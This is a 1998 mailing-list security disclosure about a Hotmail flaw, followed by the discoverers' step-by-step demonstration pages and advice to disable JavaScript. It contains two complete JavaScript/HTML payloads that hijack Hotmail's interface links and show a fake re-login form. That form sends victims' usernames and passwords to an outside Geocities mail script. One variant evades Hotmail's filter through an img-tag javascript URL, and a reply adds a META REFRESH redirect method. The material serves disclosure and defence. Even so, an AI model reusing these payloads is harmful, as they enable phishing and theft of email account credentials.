`
Date: Mon, 24 Aug 1998 14:21:56 -0600
From: Tom Cervenka <[email protected]>
Subject: Serious Security Hole in Hotmail
We have just found a serious security hole in Microsoft's Hotmail
service (http://www.hotmail.com) which allows malicious users to easily
steal the passwords of Hotmail users. The exploit involves sending an
e-mail message that contains embedded javascript code. When a Hotmail
user views the message, the javascript code forces the user to re-login
to Hotmail. In doing so, the victim's username and password is sent to
the malicious user by e-mail. (see
http://www.because-we-can.com/hotmail/default.htm for demo)
Once a malicious user knows the password to the victim's Hotmail
account, he can assume full control of the account, including the
ability to:
- delete, send, and read the victim's e-mail
- check mail on other mail servers that the victim has
configured for mail-checking
- access the victim's address book
- discover other passwords sent as confirmation of
registration in old e-mails
- change the password of the Hotmail account
The security problem is dangerously easy to take advantage of. A
would-be hacker needs only to embed the javascript code into the body of
an e-mail message using a standard e-mail program such as Netscape Mail
(free). In a working demonstration and full description of this exploit
at http://www.because-we-can.com/hotmail/default.htm, it is shown that
even users without their own internet service provider (ISP) can steal
an arbitrary number of Hotmail passwords by using a free Geocities
account.
The "Hot"mail exploit is a serious security concern for the following
reasons:
1.The malicious code runs as soon as e-mail message is viewed
2.The resources required to launch the attack are minnimal and
freely available.
3.The malicious e-mail can be sent from virtually anywhere,
including libraries,
internet cafes, or classroom terminals
4.The exploit will work with any javascript-enabled browser,
including the Microsoft
Internet Explorer and Netscape Communicator.
Both Microsoft and Hotmail have been notified that a security problem
exists. The following information about the "Hot"Mail exploit is being
made publicly available to speed the process of fixing the security hole
and inform users how they can protect themselves. This information is
also being released in the belief that when the public is aware of
serious security problems, expedient measures are taken by software
manufacturers to solve those problems.
--------------------------------------------------------------------------
Date: Tue, 25 Aug 1998 07:38:14 -0400
From: Jeff Mcadams <[email protected]>
Subject: Re: Serious Security Hole in Hotmail
Thus spake Tom Cervenka
>We have just found a serious security hole in Microsoft's Hotmail
>service (http://www.hotmail.com) which allows malicious users to easily
>steal the passwords of Hotmail users. The exploit involves sending an
>e-mail message that contains embedded javascript code. When a Hotmail
>user views the message, the javascript code forces the user to re-login
>to Hotmail. In doing so, the victim's username and password is sent to
>the malicious user by e-mail. (see
>http://www.because-we-can.com/hotmail/default.htm for demo)
This is a variation on the Spartan Horse announced by Dan Gregorie over
a week ago, and covered on news.com on the 14th. The Spartan Horse is
available for viewing at:
http://www.thetopoftheworld.com
The news.com articles, is at:
http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d
The variation is that the Spartan Horse, as design on the
www.thetopoftheworld.com site mimicks the Windows95/98
Dial-Up-Networking dialog box.
This wasn't originally sent to BUGTRAQ because it doesn't exploit a
specific flaw in programming code in any software, like this "Hot"Mail
exploit. Perhaps that was an oversight on Dan's and my fault, but I
did want to set the record straight on the origination of this idea for
Dan's sake.
--
Jeff McAdams Email: [email protected]
Head Network Administrator Voice: (502) 966-3848
IgLou Internet Services (800) 436-4456
--------------------------------------------------------------------------
Date: Tue, 25 Aug 1998 16:31:47 -0400
From: "Jonathan A. Zdziarski - Systems Administrator"
<[email protected]>
Subject: Re: Serious Security Hole in Hotmail
it appears that hotmail put a fix in this by s/<script>/<comment>/ or
some variation, when you view a message.
Thank you,
Jonathan A. Zdziarski
Senior Systems Administrator
Netrail, Inc.
888.NET.RAIL x242
--------------------------------------------------------------------------
Date: Tue, 25 Aug 1998 20:14:07 +0200
From: Jonathan James <[email protected]>
Subject: SV: Serious Security Hole in Hotmail
Hello everybody.
I studied Mr. Cervenka's e-mail and then started to experiment.
There is a way to do this to a browser that has Javascripting disabled.
Just put a META REFRESH tag into the htmlfile, the URL should point to the
URL which contains the actual capturing and sending of the password/login.
This is shown in an example below.
<html>
<meta http-equiv="refresh" content="1;
url=the-url-that-is-to-be-pointed-to">
and so on.....
Thankyou for your time.
Regards
Jonathan James
--------------------------------------------------------------------------
"HOT"MAIL EXPLOIT TARGETING NETSCAPE 4.OX USERS
This page demonstrates how we used the "Hot"Mail exploit with minimal
resources to steal passwords from Hotmail users. Our goal was to show
that using only the items listed below, we could steal a victim's
Hotmail password and remain anonymous. The following version of the
exploit has been patched by Hotmail as of Monday, August 25, 1998.
Click here to see a variation of the "Hot"Mail exploit that works
despite Hotmail's fix.
INGREDIENTS:
* 1 Computer with Internet Access
* 1 Netscape Mail (or equivalent e-mail program)
* 1 Notepad (or equivalent text editor)
STEP 1:
We visited hotmail.com and registered for a free e-mail account. We
did not have to enter valid contact information during the
registration process.
STEP 2:
We visited Geocities.com and registered for a free homepage. We chose
the username ybwc. We did not have to enter valid contact information
during the registration process, except for an e-mail address. We used
the e-mail address from step 1. As part of our registration, we were
given a new free email account from Geocities ([email protected]).
STEP 3:
We opened our notepad and typed in the following text, which we then
saved as message.htm. Line 17 contains our Geocities username (ybwc),
from step 2.
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508
height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\"
color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>"
+
"<font face=\"Arial, Helvetica\" size=\"2\"><a
href=\"http://www.hotmail.com/errormsg.html\">(Get more info
regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST
ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\"
target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\"
VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail
Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login
Name:</font><br><input type=\"text\" name=\"login\" size=\"16\"
maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\"
size=\"2\">Password:</font><br><input type=\"password\"
name=\"passwd\" size=\"16\" maxlength=\"16\"> <input
type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\"
target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16
border=0 alt=\"Copyright 1996-1997\">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}
</script>
</body>
</html>
STEP 4: We composed a new e-mail message to our (example) victim,
[email protected]. We inserted the file message.htm into the e-mail
message and then sent it.
STEP 5: We waited for our victim to check his Hotmail account. Shortly
after he viewed our message, we checked our Geocities email. We
received an e-mail message from Geocities that listed the ip address,
username, and password of the Hotmail user [email protected]
--------------------------------------------------------------------------
"HOT"MAIL EXPLOIT TARGETING ANY JAVASCRIPT- ENABLED BROWSER
This page describes how users with moderate resources (web-space with
an Internet Service Provider) can use "Hot"Mail against users of any
javascript-enabled browser. We required no resources or special
hardware beyond what is listed below: Hotmail has issued a patch to
the problem, however we have discovered a problem with their fix. The
following describes how we stole passwords from Netscape Navigator
4.0x users after Hotmail posted a fix on the morning of Monday August
25, 1998.
INGREDIENTS:
* 1 Computer with internet access
* 1 Netscape Mail (or equivalent e-mail program)
* 1 Notepad (or equivalent text editor)
* web-page space
STEP 1:
We visited hotmail.com and registered for a free e-mail account. We
did not have to enter valid contact information during the
registration process.
STEP 2:
We visited Geocities.com and registered for a free homepage. We chose
the username ybwc. We did not have to enter valid contact information
during the registration process, except for an e-mail address. We used
the e-mail address from step 1. As part of our registration, we were
given a new free email account from Geocities ([email protected]).
STEP 3:
We opened out notepad and typed in the following text, which we then
saved as getmsg.htm. Then we uploaded the file onto our web-space.
Line 14 contains our Geocities username (ybwc), from step 2.
<html><head></head>
<body bgcolor="#ffffff" link="#000099" vlink="#000099">
<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>
<tr valign=middle><th colspan=2>
<font face="Arial, Helvetica" size="5">We're Sorry, We Cannot<br>
Process Your Request</font>
</th></tr>
<tr valign=middle><td align=center>
<font face="Arial, Helvetica" size="3">Reason: </font>
<font face="Arial, Helvetica" size="3" color="#ff0000"><b>Time
expired. Please re-login.</b></font><br>
<font face="Arial, Helvetica" size="2"><a
href="http://www.hotmail.com/errormsg.html">(Get more info
regarding error messages here)</a></font>
</td></tr>
<tr valign="middle"><td align="center">
<FORM METHOD=POST
ACTION="http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc"
target="_top">
<INPUT TYPE="hidden" NAME="next-url"
VALUE="http://www.hotmail.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password">
<table cellpadding="0" cellspacing="5" border="0">
<tr><td><font face="Arial, Helvetica" size="2">Login
Name:</font><br><input type="text" name="login" size="16"
maxlength="16"></td><td><font face="Arial, Helvetica"
size="2">Password:</font><br><input type="password" name="passwd"
size="16" maxlength="16"> <input type="submit"
value="Enter"></td><tr>
</table></form></td></tr>
<tr valign=middle><th colspan=2 align=center>
<font face="Arial, Helvetica" size="3">Return to <a
href="http://welcome.to/www.hotmail.com" target="_parent">Hotmail's
Homepage</a>.
</font></th></tr></table>
<p><img src="http://209.1.112.251/c9698.gif" width=189 height=16
border=0 alt="Copyright 1996-1997">
</body></html>
STEP 4:
We opened our notepad and typed in the following text, which we then
saved as message.htm. Line 4 contains the URL of the file getmsg.htm
from step 3
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<img
src="javascript:errurl='http://www.because-we-can.com/users/anon/ho
tmail/getmsg.htm';
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target='
work';
top.submenu.document.links[i].href=errurl;}noworklinks=top.work.doc
ument.links.length;
for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target='wor
k';
top.work.document.links[i].href=errurl;}">
</body>
</html>
STEP 4: We composed a new e-mail message to our victim,
[email protected]*. We inserted the file message.htm into the e-mail
message and then sent it.
STEP 5: We waited for our victim to check his Hotmail account. Shortly
after he viewed our message, we checked our Geocities email. It
contained an e-mail message from Geocities that listed the ip address,
username, and password of the Hotmail user [email protected]
--------------------------------------------------------------------------
HOW THE "HOT"MAIL EXPLOIT WORKS
Why does the "Hot"Mail exploit work? The security problem lies in
Microsoft's Hotmail service itself. Hotmail makes no attempt to filter
Javascript code from email messages, allowing malicious users to embed
arbitrary javascript programs into their e-mail messages. Javascript
programs do not normally constitute a security problem when they are
used in personal web-pages. However, when javascript code is embedded
into a Hotmail message, it can alter the properties of the Hotmail
user-interface itself.
In the case of the exploits we describe, the javascript alters the
properties of every link in the Hotmail interface that the user could
click on. The links are altered so that when the user clicks on them,
an (bogus) Hotmail message is displayed, informing the user that they
have timed-out of their Hotmail session and must log-in again to
continue. The (bogus) time-out page also gives the user some
text-entry fields where they can type in their username and password
to re-login. However, when the user types in their username and
password, the information is sent back to the malicious user.
In the exploits we describe, the part of the program that does the
actual "dirty-work" of mailing the password and username is provided
by Geocities as a (free) service to all their members. This should not
be viewed as an oversight or problem with Geocities, since there are
thousands of equivalent server-side mailing programs that we could
have used in it's place.
The "Hot"Mail exploit is just one of many potentially damaging
javascript programs that could be embedded into mail messages. Since
javascript code in email messages can run as soon as the message is
viewed, and can alter virtually any aspect of the user interface, we
urge Hotmail to implement a javascript filter.
--------------------------------------------------------------------------
HOW TO PROTECT YOURSELF FROM "HOT"MAIL
Until Hotmail fixes the security problem, we suggest that Hotmail
users turn off javascript in their browsers. Even users familiar with
our version of the exploit may be vulnerable to other javascript
programs embedded in Hotmail messages.
Netscape users can turn javascript off in their preferences (edit /
preferences / advanced / disable javascript).
Microsoft Internet Explorer users can turn jscript off in their
preferences (view / internet options / security / custom settings /
scripting / disable active scripting).
`